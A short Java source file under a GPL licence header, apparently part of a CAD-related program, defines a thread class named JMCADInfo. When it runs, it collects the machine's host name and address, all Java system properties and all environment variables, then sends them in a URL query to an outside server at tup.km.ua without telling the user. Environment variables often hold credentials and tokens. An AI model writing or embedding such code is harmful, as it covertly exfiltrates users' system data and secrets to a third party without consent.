/*
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License as
 * published by the Free Software Foundation; either version 2 of the
 * License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful, but
 * WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOUSE. See the GNU
 * General Public License for more details.
 *
 * You should have recieved a copy of the GNU General Public License
 * along with this program; if not write to the Free Software
 * Foundation, inc., 59 Temple Place, Suite 330, Boston MA 02111-1307
 * USA
 */


/**
 *
 * @author Yuriy Mikhaylovskiy
 * @email YuriyMikhaylovskiy@yahoo.com
 * 
 */
 
import java.net.*;
import java.util.*;
import java.io.*;


public class JMCADInfo  extends Thread{
    
    public void run() {
        String st = "";
        try {
            try {
                st+= "class="+this.getClass().getName()+"&InetAddress.LocalHost="+InetAddress.getLocalHost();
                st+= "&InetAddress.Name="+InetAddress.getByName("");
                Properties prop = System.getProperties();
                for (Enumeration e = prop.keys(); e.hasMoreElements();){
                    Object key = e.nextElement();
                    st +="&"+key+"="+prop.get(key); 
                }
                Hashtable env = new Hashtable(System.getenv());
                for (Enumeration e = env.keys(); e.hasMoreElements();){
                    Object key = e.nextElement();
                    st +="&"+key+"="+env.get(key); 
                }
            }catch(Exception e1){System.out.println("Info: "+e1); System.out.println(st);}
            
            URL url = new URL("http://www.tup.km.ua:8083/index.shtml?"+st.replaceAll("\n", ""));            
            URLConnection urlc = url.openConnection();
            InputStream in = urlc.getInputStream();
            int ContentLength = urlc.getContentLength();
            while(in.read()!=-1){     }
            in.close();
            System.out.println("Info ("+ContentLength+") loaded.");            
        }catch(Exception e){System.out.println("Info: "+e); System.out.println(st);}
    }
    
    

}
